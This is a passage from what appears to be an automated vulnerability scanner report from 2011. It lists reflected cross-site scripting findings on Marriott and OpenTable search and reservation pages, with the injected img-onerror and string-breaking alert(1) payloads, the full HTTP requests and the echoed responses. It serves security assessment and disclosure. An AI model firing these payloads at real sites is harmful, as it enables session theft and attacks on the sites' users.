Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:01 GMT
Content-Length: 326400
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<a href="http://www.ritzcarlton.com/en/prm/BOSRT/Reservations/Default.htm?mtid=marriott&cc=NONEF56E8"><IMG SRC=A ONERROR=ALERT(1)>D2F0CC2067A&gc=&rn=&locale=en_US&nr=1&ci=&ng=1&co=&ssoAction=false" target="new">
...[SNIP]...

4.51. http://www.marriott.com/search/submitSearch.mi [clusterCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the clusterCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca38d"><img%20src%3da%20onerror%3dalert(1)>eb73406188b was submitted in the clusterCode parameter. This input was echoed as ca38d"><img src=a onerror=alert(1)>eb73406188b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=ca38d"><img%20src%3da%20onerror%3dalert(1)>eb73406188b&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD243_prd3; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 335102


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<iframe src="https://fls.doubleclick.net/activityi;src=1359549;type=count810;cat=marri724;u16=US;u15=1;u12=1;u11=1;u14=;u13=;u10=0;u9=10/3/11;u1=;u19=BOS|MA|US;u20=CA38D"><IMG SRC=A ONERROR=ALERT(1)>EB73406188B;ord=1;num=1?" width=1 height=1 frameborder=0>
...[SNIP]...

4.52. http://www.marriott.com/search/submitSearch.mi [displayableIncentiveType_Number parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the displayableIncentiveType_Number request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b10"><img%20src%3da%20onerror%3dalert(1)>146ee02219e was submitted in the displayableIncentiveType_Number parameter. This input was echoed as d2b10"><img src=a onerror=alert(1)>146ee02219e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=d2b10"><img%20src%3da%20onerror%3dalert(1)>146ee02219e&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:31 GMT
Content-Length: 325973
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<input id="hd_incentivesType_Number" type="hidden" value="d2b10"><img src=a onerror=alert(1)>146ee02219e" />
...[SNIP]...

4.53. http://www.marriott.com/search/submitSearch.mi [fromDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the fromDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e560"><img%20src%3da%20onerror%3dalert(1)>0a08f5e4844 was submitted in the fromDate parameter. This input was echoed as 6e560"><img src=a onerror=alert(1)>0a08f5e4844 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=6e560"><img%20src%3da%20onerror%3dalert(1)>0a08f5e4844&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD244_prd3; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:57:42 GMT
Content-Length: 174403
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<input type="text" name="fromDate" id="global-header-hotel-fromDate" value="6e560"><img src=a onerror=alert(1)>0a08f5e4844" maxlength="10" class="calendar-module-fromdate search-fromDate" />
...[SNIP]...

4.54. http://www.marriott.com/search/submitSearch.mi [toDate parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/submitSearch.mi

Issue detail

The value of the toDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3646"><img%20src%3da%20onerror%3dalert(1)>9b47fe00376 was submitted in the toDate parameter. This input was echoed as d3646"><img src=a onerror=alert(1)>9b47fe00376 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/submitSearch.mi?searchType=InCity&groupCode=&searchRadius=50&recordsPerPage=10&vsMarriottBrands=&destinationAddress.city=bos&destinationAddress.stateProvince=&destinationAddress.country=&fromDate=&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=d3646"><img%20src%3da%20onerror%3dalert(1)>9b47fe00376&populateTodateFromFromDate=true&defaultToDateDays=1&roomCount=1&guestCount=1&marriottRewardsNumber=&clusterCode=none&corporateCode=&displayableIncentiveType_Number=&marriottBrands=all HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; JVMID=pEbizMdcomD167_prd1; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD171_prd3; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:58:22 GMT
Content-Length: 174526
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<input type="text" name="toDate" id="global-header-hotel-toDate" value="d3646"><img src=a onerror=alert(1)>9b47fe00376" maxlength="10" class="calendar-module-todate search-toDate" />
...[SNIP]...

4.55. https://www.marriott.com/reservation/availabilitySearch.mi [displayableIncentiveType_Number parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availabilitySearch.mi

Issue detail

The value of the displayableIncentiveType_Number request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afd24"><img%20src%3da%20onerror%3dalert(1)>93f0d6f20368e179d was submitted in the displayableIncentiveType_Number parameter. This input was echoed as afd24"><img src=a onerror=alert(1)>93f0d6f20368e179d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof of concept shown here uses an event handler (onerror on an injected img element) to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /reservation/availabilitySearch.mi?isSearch=false&accountId=&fromDate=10%2F3%2F11&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&weekDays=S%2CM%2CT%2CW%2CT%2CF%2CS&dateFormatPattern=M%2Fd%2Fyy&toDate=10%2F4%2F11&populateTodateFromFromDate=true&defaultToDateDays=1&numberOfNights=1&numberOfRooms=1&numberOfGuests=1&marriottRewardsNumber=&useRewardsPoints=false&clusterCode=none&corporateCode=&groupCode=&displayableIncentiveType_Number=afd24"><img%20src%3da%20onerror%3dalert(1)>93f0d6f20368e179d&btn-submit=&sSubmit=Search&section=availability&sSubmit=Search HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.marriott.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; MI_SITE=prod3; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B

Response (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD170_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 13:09:43 GMT
Content-Length: 78948
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
<input id="hd_incentivesType_Number" type="hidden" value="afd24"><img src=a onerror=alert(1)>93f0d6f20368e179d" />
...[SNIP]...

4.56. http://www.opentable.com/interim.aspx [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf00e'%3balert(1)//25a9e3f968c was submitted in the d parameter. This input was echoed as cf00e';alert(1)//25a9e3f968c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PMcf00e'%3balert(1)//25a9e3f968c&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a53&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=7&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PMcf00e';alert(1)//25a9e3f968c&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...

4.57. http://www.opentable.com/interim.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80c13'%3balert(1)//61446a4a109 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80c13';alert(1)//61446a4a109 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod&80c13'%3balert(1)//61446a4a109=1 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:04 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:04 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a04&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=47&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=12&vbefreg=12&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:04 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
